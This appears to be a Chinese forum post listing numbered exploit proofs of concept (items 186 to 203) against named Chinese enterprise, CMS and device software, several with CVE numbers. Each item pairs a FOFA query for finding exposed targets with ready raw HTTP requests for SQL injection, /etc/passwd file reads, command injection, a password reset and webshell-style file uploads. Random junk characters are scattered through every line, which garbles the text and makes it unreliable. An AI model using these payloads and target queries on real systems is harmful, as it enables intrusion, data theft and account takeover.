GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
* W& h$ ^; b- l* AHost: host
8 L8 c; r5 _( b3 k; h! |3 K/ z7 l# t4 e& z
! w, F6 X% |7 A: r! D0 G4 q# f186. F-logic DataCube3 SQL注入+ B0 ]5 F8 {9 ?% ]0 e/ i+ k7 H
CVE-2024-31750# q. d. D' m: w) ~
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
3 ?1 b! G4 r" i% hFOFA:title=="DataCube3"0 J; Q& Z/ e: w! o' C" d! d
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
- Z4 f$ ]) Q5 Q& J/ @# g: L, HHost: your-ip
. c) T, U7 a& M0 c$ ^8 I9 x3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 ?& |3 a. i) r. A+ _0 z v2 H |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8: T2 A. b" p: \' ?2 M: M6 ]# l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 D; q/ U0 L) J1 e5 DAccept-Encoding: gzip, deflate3 _) ]7 u1 L6 T7 ~ c9 Q
Connection: close
& ?# L6 s1 K6 V- e3 A( ~9 L/ IContent-Type: application/x-www-form-urlencoded
5 ^0 v4 Z W1 k
- Y' `0 V) m7 S3 C; Ereq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450" f9 }, j3 u+ a* v5 }' f
, }1 _6 x- b( \! B" p! h# o% K" E$ H0 O5 Y
187. Mura CMS processAsyncObject SQL注入
. R- V; ]' @1 h1 m! o) {CVE-2024-32640' i. i8 P8 ~6 n1 y
FOFA:"Mura CMS"2 z. e" A6 M) ]: V
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.15 ]7 y: S+ q+ K5 {+ C3 }
Host: your-ip6 o6 ~% n: j; o3 t [
Content-Type: application/x-www-form-urlencoded
$ M' C$ {$ C. F" U
3 y# j3 h/ d- B+ q" E' s
& F; |1 v7 \6 d* Y" pobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 i1 ]* j2 \; M# _" Y, W2 N
+ d# y" H( j" Z+ b% J
r, n- a& j- |188. 叁体-佳会视频会议 attachment 任意文件读取, Y( E2 Z6 ^9 D1 B1 [1 Y
version <= 3.9.7( h: y; @1 J p I( g' W. @0 Y
FOFA:body="/system/get_rtc_user_defined_info?site_id"7 I% u: R4 ^4 I: t
GET /attachment?file=/etc/passwd HTTP/1.1
* \+ m& ]& _0 v4 ZHost: your-ip/ g `/ K0 h( R/ [$ C. y3 ~+ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
" y$ t2 W$ ]% k, H! ?& P8 P! H$ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" V6 j0 @8 h! x4 w$ X
Accept-Encoding: gzip, deflate i! R: |' B, R( X5 C
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 _% g1 s# r0 u/ b) lConnection: close
& _/ v, t& Q5 R# {. |4 C) z% u. x8 m! T; k( ~0 E3 w6 Z
' x2 _$ T4 y$ K0 ]189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" x0 Z, i- Y) p6 U, MFOFA:app="LANWON-临床浏览系统"
% r2 y' j( O; O7 ]3 M% n& l$ XGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
, i3 q n3 u C# q0 i( zHost: your-ip1 c1 o* }& Z$ R: J: ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
! p2 b0 D0 @; ]* O% ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* a1 w, E2 C9 J6 c$ Y. X1 `; d2 B/ Z
Accept-Encoding: gzip, deflate
3 M/ t6 N* y: E1 mAccept-Language: zh-CN,zh;q=0.9
: ]! w2 T5 F% m" R) ^Connection: close' `9 L1 S2 t+ J: D) o. |! Y
+ M# P6 u' M8 K* ?/ L, Y: S, `% g8 [% x, I' c
190. 短视频矩阵营销系统 poihuoqu 任意文件读取/ l6 _# s N! h$ n; m( r
FOFA:title=="短视频矩阵营销系统"9 ]3 c( v8 m/ T+ x; x
POST /index.php/admin/Userinfo/poihuoqu HTTP/23 W0 A9 P7 l7 u% F
Host: your-ip
: }& P: @, ?" G8 K: IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.366 c6 F% Y. U9 O1 T2 S B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' X( H& u1 ~) Z3 K
Content-Type: application/x-www-form-urlencoded/ N3 z. E* B1 P" f$ n1 a
Accept-Encoding: gzip, deflate2 H1 r; G( r; Q. y. y# B& y
Accept-Language: zh-CN,zh;q=0.9
+ \- A: Q& ~! y Y* N# ^
( J" s; q8 U( Y j7 }poi=file:///etc/passwd7 ^, s3 y9 R3 ]
- g2 n2 k, S* `# E
& u% y6 ~1 B) U; I/ `/ k( `191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
, F7 C) _- m5 N, w" K( r' ~7 iFOFA:body="/CDGServer3/index.jsp"* s# T9 b" q, ~
POST /CDGServer3/js/../NavigationAjax HTTP/1.1, F$ T4 k9 l" g" w
Host: your-ip
7 F" M0 Z7 o1 g. R. [2 j2 t1 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ d) m( E# P% Z( z, S B
Content-Type: application/x-www-form-urlencoded
) ?" @+ M( ~" y0 A% P4 \
" ]# U% C+ Z1 B+ H0 Jcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
+ d( b. B) ^6 K3 T
( r1 u- ]* k; b! Y& d( _6 p/ J) q8 b5 I9 Z3 J* M
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传2 i* v3 f8 D3 L: {9 M
FOFA:title="用户登录_富通天下外贸ERP"
; }0 v: ?' m& F+ `" ^7 D) TPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 H$ I7 e3 y. \& N$ Z. s; a( uHost: your-ip: D2 N8 t# p7 A7 a6 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" ~0 k9 W, A( u* n! M% O- N3 y
Content-Type: application/x-www-form-urlencoded
4 x8 t# ~: J6 D6 Z5 U0 g2 x
; n+ G) g7 _( N) t( X9 W% i" J, q1 p: Y" f4 s
<% @ webhandler language="C#" class="AverageHandler" %>8 j+ v% d* Q* Z) D
using System;
/ ^# H1 f. o' cusing System.Web;, s0 B2 Y" C. ~* v+ W) `
public class AverageHandler : IHttpHandler8 y. D+ l. a. k3 X0 g! j; e
{
4 d4 M& J) f" s- i Y% W/ Zpublic bool IsReusable
7 r8 ?& l$ O; k6 s& j! w{ get { return true; } }. z6 @3 |6 D5 [# C; C
public void ProcessRequest(HttpContext ctx)
( C) Z" V6 C6 v/ M. H( c; ]{
X6 l: S* k3 ]7 z( u' t% Vctx.Response.Write("test");, Y& `5 q0 j( K
}+ b0 K n& f; @8 ]) J
}
6 W6 g) \, K2 z' W% K( i1 L, A. v
; p# ~& p0 F7 `. _( r1 Y! j: x+ V0 V! ~; r
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, Z. G3 {6 V j8 w* r0 p2 kFOFA:body="山石云鉴主机安全管理系统" p6 ~ S2 F# n! g0 F' Y
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
$ V7 F8 i: O/ A) W" ]( L; j! mHost:
' r( o7 X( W- u+ VCookie: PHPSESSID=2333333333333;
0 R0 Q9 N5 b, W, n# SContent-Type: application/x-www-form-urlencoded% B3 y+ {/ \4 X# S7 x& W0 s- y
User-Agent: Mozilla/5.0& H. i* b1 s! \/ Q0 e( z* ~
0 R. _- Z& x7 C9 l2 A. u% w! `$ [
9 n! N8 n" ~( J* @7 j) KPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1' E% _- ^% a" h. ~3 B
Host:
4 H' | y$ A% `7 p4 g2 S, EUser-Agent: Mozilla/5.08 U* ~1 W+ o5 O9 t. `
Accept-Encoding: gzip, deflate- J5 L* B# l* A x' I5 [
Accept: */*
& d1 W* }7 Q9 R9 i0 ]+ CConnection: close Q3 x/ B' ]* [+ W' l
Cookie: PHPSESSID=2333333333333; F* c- f0 U* U( w F
Content-Type: application/x-www-form-urlencoded4 H- n4 Z7 m8 ?1 \- {
Content-Length: 84/ t* C7 K- t- \' e$ X& _, K0 V
3 g, n+ B0 c+ {# l. hparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
# u( C2 H. ?% M. N) O8 S
+ [- f! R( |1 f/ P& l0 @1 s; x! Z% f- q% h5 a6 {/ p5 R
GET /master/img/config HTTP/1.1
3 C) I6 W: @5 K) z6 |Host:
) A) w! @0 \* B( r0 I5 C6 z+ ~# aUser-Agent: Mozilla/5.0
, e/ s) V2 Z: C% | O# ^
& d9 ^( u7 @5 X& P/ @7 e6 s
: C" D5 e3 w0 ^% G4 Q! g# f8 K. J194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传' a& o8 S, g, e/ ?/ w6 l
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
$ i6 B' c+ ]) J. r6 V& I' T6 G, M
POST /servlet/uploadAttachmentServlet HTTP/1.1
% a+ d D8 ^, ^Host: host
4 F1 t2 F" S. D8 R, ~* b1 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.369 B! M3 s v3 A3 I( ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 J& \! ?; \( d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" a: @4 U2 \$ o* Q1 s
Accept-Encoding: gzip, deflate
' o# C* C: B6 z6 lConnection: close# @, a+ e; @% h. ~" G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk/ v# {- `, l8 o- a; W( e2 H/ e, ^
------WebKitFormBoundaryKNt0t4vBe8cX9rZk4 S* T. D2 ~& [! H
: V& W: X K- K8 D: M8 [Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
7 B3 r. `2 ~2 N$ O' M" }Content-Type: text/plain
6 D% g$ I9 s! L. o+ L" H<% out.println("hello");%>+ z8 _$ R1 u' H
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
0 l! o3 p7 n9 z& u% r8 rContent-Disposition: form-data; name="json"$ z+ T1 E0 Z, F9 Z) ?* ~. Z+ f' z6 Z
{"iq":{"query":{"UpdateType":"mail"}}}
, }6 }$ ~; g( G& A$ L------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
8 ^# K% f% H2 B) N: F R$ t0 g
9 m/ `, S* E* r% @6 [( ^% w; P2 l: a. T- F( ~0 g8 J# v0 W- g
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 S( v& s7 L& Y1 K- K- p1 i. U9 \" b1 {
FOFA:title=="飞鱼星企业级智能上网行为管理系统
1 Z/ w6 X5 n: e' S D( _' ^$ i SPOST /send_order.cgi?parameter=operation HTTP/1.1" f' L3 d& X) U5 @4 [
Host: 127.0.0.1
! |4 \8 p8 Q Y+ R$ o6 j' a% |Pragma: no-cache- B3 |4 r4 q; ^1 T
Cache-Control: no-cache9 P) }! |: _7 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.364 y8 C" X/ h4 d& B
Accept: */*
, `$ L. J! }1 P8 T. C2 fAccept-Encoding: gzip, deflate T D, s: [; v# q3 U1 b
Accept-Language: zh-CN,zh;q=0.97 `3 M7 i$ k3 p% v
Connection: close
# ~- Q8 g5 \6 K9 O: ^1 t v4 eContent-Type: application/x-www-form-urlencoded
- ?. Z1 a0 ~! K4 y' dContent-Length: 68
9 K1 b/ k2 @, o6 F: C1 m* W& T5 m; ?; J
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}, k3 Q- B/ z3 V" j9 N
& m+ r( z4 I7 m; z/ ~( p5 j: \" ^8 H6 C
196. 河南省风速科技统一认证平台密码重置* d' d5 x1 ?! f0 ^* |( U1 m9 u
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"2 v! s/ m7 j' F l, H+ _! ?1 [! H
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1# C. h5 b( z- B0 i2 h P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 [; \# p- P) g
Content-Type: application/json;charset=UTF-8+ x# v% S/ q6 e* Q7 r4 a9 Q
X-Requested-With: XMLHttpRequest
6 ?# O7 f, ~1 j1 K1 E" R' C) BHost: h4 d5 z2 ]4 g/ f" B6 R
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
! N* R- i/ l% ~. Y1 WContent-Length: 45
% S5 k/ N/ \9 _) m3 EConnection: close
% D+ o# p, s9 ?4 ?, D, Y S
8 C1 [' N$ ]- J9 q{"xgh":"test","newPass":"test666","email":""}9 _9 F2 l# L+ k& X
2 |" r% P2 B& {; h9 g: G+ a! S' {1 A2 o) Q) N
8 |5 ?- w9 D; e2 E7 ~197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& j, c1 G2 A9 L/ K0 Q5 a
FOFA:app="浙大恩特客户资源管理系统"0 Q: D7 q8 _) L- `) o/ q8 E& T
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1* ]5 Y9 }1 @( Q& ~2 X2 V- I. h
Host:! n2 a' O$ @& |: ~# d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
L1 s# Q% V, W3 q3 g5 fAccept-Encoding: gzip, deflate$ q+ W4 G: c9 ]- i
Connection: close( R, C! e/ ^. R+ j U3 l
; m7 D# ]3 |7 ?( z) V! k3 ?2 X" g+ Y9 i
& ~- S/ \! u5 f( u8 D
198. 阿里云盘 WebDAV 命令注入
9 g) r7 J# d' G N, Y0 _CVE-2024-29640( I1 V% j; ]$ {
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1 p+ J0 @+ o8 M/ N- E0 k( m% h; f
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf642 X: {1 }6 X+ B y
Accept: */*
# s) K; Z! N; O$ U! \/ }# `2 sAccept-Encoding: gzip, deflate
! ?$ P/ x5 _* D3 m# VAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.69 K; `2 ~0 _% _2 I
Connection: close
3 T* ]* O9 S a( H5 G( d2 q
$ q- H/ |9 d0 b" B/ L: U. A7 g1 L
199. cockpit系统assetsmanager_upload接口 文件上传8 R) B9 X, |1 g3 L$ d m9 N) N
C5 }1 }. L9 S( P1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:, f7 V- p0 N6 L. g4 D# r3 ]
GET /auth/login?to=/ HTTP/1.1
; G. A$ Q& l% c, c% x9 [) K Q/ Y1 r. F. Y: U) f1 j2 g: ]
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"% [# y$ ~4 q( B* @3 M
a7 ~6 h) u7 S2.使用刚才上一步获取到的jwt获取cookie:
5 L& b: h- i' ?( ]- M) J4 u& a, W6 V1 O$ g- P M
POST /auth/check HTTP/1.1) r2 }7 b% R6 H9 b0 E
Content-Type: application/json
! w7 c; z, n- B& r, s+ T8 t$ ~
7 j) y G% T" s0 K$ Y- R- K' @{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}. Z: j1 l& D5 c( W" Y+ _' Z
" V; [- T' x& B响应:200,返回值:& J" s9 z' q9 R$ D6 {
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
* |6 s$ w% }' R# j2 X" LFofa:title="Authenticate Please!"
8 z4 n3 c4 G5 e; m( _( NPOST /assetsmanager/upload HTTP/1.1
3 x* ^# b* W$ b/ ^. M0 Y- [: F% E( lContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
8 ?4 I2 P( d! o- T/ yCookie: mysession=95524f01e238bf51bb60d77ede3bea92
% B) N- a# E$ ]8 U8 `) R* x' G. h# v6 {* Q# H
-----------------------------36D28FBc36bd6feE7Fb3
* Q' {; u: B" u$ |- _4 `Content-Disposition: form-data; name="files[]"; filename="tttt.php"
: C& w% a- A6 k: X( RContent-Type: text/php- i% ^- v" c3 Q
, u( W/ M3 ?/ q1 r7 s* G) N
<?php echo "tttt";unlink(__FILE__);?>! t+ K8 j9 }& y8 R7 C {6 B
-----------------------------36D28FBc36bd6feE7Fb32 e7 P/ I, G6 c8 H( v3 J, I
Content-Disposition: form-data; name="folder"
. D; j; c, z( H0 F, [1 b$ S- V+ L% Z4 r) f& [$ }' ~3 d% n: k2 d5 Z
-----------------------------36D28FBc36bd6feE7Fb3--
% v" S0 z) {* d1 \/ r( L/ I1 X/ Z. P; I: V
+ }0 g* q4 \8 n' ?6 G* a/storage/uploads/tttt.php
% M9 {. ~2 m; m+ ]. ^1 c
/ f& F( ?) x* C" v+ X/ P+ M200. SeaCMS海洋影视管理系统dmku SQL注入
0 o. J/ R6 ^1 J R* ]) [9 a1 V2 U4 xFOFA:app="海洋CMS"6 C# M9 a' m! n9 y* X3 @: b
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
5 A8 N+ i4 G, u2 b, j& g& P! h( sCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
% l' o) \% d; FUpgrade-Insecure-Requests: 1
* L4 g" ]7 q5 O. R YCache-Control: max-age=0( B$ f5 E `8 W( i8 g2 b, s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* @7 m1 Z5 X2 r1 d" C r9 [
Accept-Encoding: gzip, deflate9 _0 |8 R8 j7 {4 ]/ y
Accept-Language: zh-CN,zh;q=0.91 { U" \7 i* s$ F! i
! c& K7 o7 w0 s0 G) D% p+ e; R
: c7 `' I- s9 w \* y g201. 方正全媒体新闻采编系统 binary SQL注入
4 f) k0 s: z3 q/ `FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
e- p; E9 V0 `9 M0 w+ O8 R" mPOST /newsedit/newsplan/task/binary.do HTTP/1.1) |& l8 u$ W. g, x) f. x. Q8 _
Content-Type: application/x-www-form-urlencoded& G( r( m4 h9 Z; H# H! |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ M* z1 f0 }/ n1 h" Z& T L* p: d
Accept-Encoding: gzip, deflate; j2 P. I9 ~8 r7 v" }$ |5 W/ Z
Accept-Language: zh-CN,zh;q=0.9% T% K& L7 m# H) p! x0 U" u) j
Connection: close
& u \* a* T% P" F& q
* P4 e- S; Y5 D7 E3 bTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
, d3 o1 [7 k8 w* K5 ~ F
& M- o4 p- a P |( p1 e; b2 B3 j+ H* o8 g, D, U! b7 f6 q- B
202. 微擎系统 AccountEdit任意文件上传' H+ z/ L& s% F% D' M, @; g
FOFA:body="/Widgets/WidgetCollection/"
* X, `) z( C2 P8 X( ~; ^获取__VIEWSTATE和__EVENTVALIDATION值* B1 B% a% p3 L1 b* [) j ^+ A
GET /User/AccountEdit.aspx HTTP/1.1/ t) ?9 O# h2 }7 w; a
Host: 滑板人之家- {& p$ S2 Z" g2 K4 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31 K& Q4 c& w0 r+ G2 q& E$ t/ ^
Content-Length: 0
* k5 ]8 {; R$ G9 {
- I2 a$ u* k6 w W9 O' `7 l+ j G4 h7 |. K3 c) |+ Y
替换__VIEWSTATE和__EVENTVALIDATION值
: O1 T8 t+ a) cPOST /User/AccountEdit.aspx HTTP/1.1
8 W" w% I6 t T1 |2 w5 cAccept-Encoding: gzip, deflate, br
, a6 i6 P, q' P4 p% ?Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687" Z" O+ B1 @ G6 u3 [6 w
n6 D) M1 z- @4 h, E1 p! a$ b
-----------------------------786435874t38587593865736587346567358735687% k' m2 L& l6 w2 h- ^$ v# @4 W1 S
Content-Disposition: form-data; name="__VIEWSTATE"- p* i+ w; d" T$ r4 _/ b+ I
2 `; F! Q* n, E/ H
__VIEWSTATE; g9 g" W- f' o) D2 w& O
-----------------------------786435874t38587593865736587346567358735687
; P" U: q6 C( K) H6 oContent-Disposition: form-data; name="__EVENTVALIDATION"& J- y5 }6 }8 ?3 l% @- e
" i' k! j: V8 p5 s* k; x% j/ T
__EVENTVALIDATION
, |7 t# q0 i. C-----------------------------786435874t38587593865736587346567358735687, M: V# c( C' U' S! a, A
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"# R0 d: \! M# Y2 |/ W
Content-Type: text/plain; Z7 g! o! l6 Q" \4 f
5 Y2 T5 o. ~3 L' W+ F, n
Hello World!
% L! F; w0 z; }' l9 A& I0 P% U5 I-----------------------------786435874t385875938657365873465673587356874 Y6 x( \0 R/ O6 s0 T! U6 C
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"# z3 J q( m! M$ u4 v
0 G. Z# Z* f' h+ O$ [. U" H
上传图片
3 `% n8 F6 B9 m4 Q) K-----------------------------786435874t38587593865736587346567358735687
% X& u; e: C) ]; T1 JContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"5 A0 n+ U+ d4 w: B) u4 M, c% M: _
* n( Y" Y& T& d k
9 F% N* F0 j2 A. a- L
-----------------------------786435874t385875938657365873465673587356874 h( ^+ X# e4 F8 ]; _
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail". \+ g3 L A+ G
( T& G* f( |! z; B* S8 ~$ r
9 e* F8 u7 V# M- A. f6 O
-----------------------------786435874t38587593865736587346567358735687--9 o* D( j8 d1 r' M1 H
0 `. N8 l& B% w# `8 |! {6 ~# Z/ q0 W( u
/_data/Uploads/1123.txt9 b. ~! r+ U7 f: x
; T' [+ `) o' r5 W; C" @* w, ]* K
203. 红海云EHR PtFjk 文件上传
* W8 v( i+ n; yFOFA:body="RedseaPlatform"
! l6 N. C6 ^2 T3 kPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
" ~, Z. F: \. C0 i% v% n% ]Host: x.x.x.x6 X7 {* O+ v1 d+ M- {; X4 _
Accept-Encoding: gzip
+ a/ j }1 H/ @% QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( Y) v$ Q7 r3 P0 I9 f* d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4& x" o- y2 o8 S3 J0 s: |7 O
Content-Length: 2100 Y8 Q8 g/ w$ ~7 N$ g
7 t* Q u7 Y, A+ o' n------WebKitFormBoundaryt7WbDl1tXogoZys4
% d3 ]; y8 y; N* ~* T9 N' `Content-Disposition: form-data; name="fj_file"; filename="11.jsp"4 o! ^" }1 `8 Q8 a' d$ m
Content-Type:image/jpeg* }7 S0 P7 s$ p$ h. L2 P1 }
; F0 w% c6 U ?3 @ |
<% out.print("hello,eHR");%>
' V% }9 K4 q' J2 h------WebKitFormBoundaryt7WbDl1tXogoZys4--' h: {7 q3 J$ Z2 L: _( D
4 J z6 _7 |/ v, U
2 D; D+ w7 d+ f. X! U. y7 L$ I' H4 @5 E
+ G9 X7 b; m: ~( O% i
* [: a, ?! {, P5 |5 f
5 X- E- \7 t% m: Z) n8 S
% I8 H/ @. m8 v& w |
发表于 2024-6-5 14:31:29
收藏
支持
反对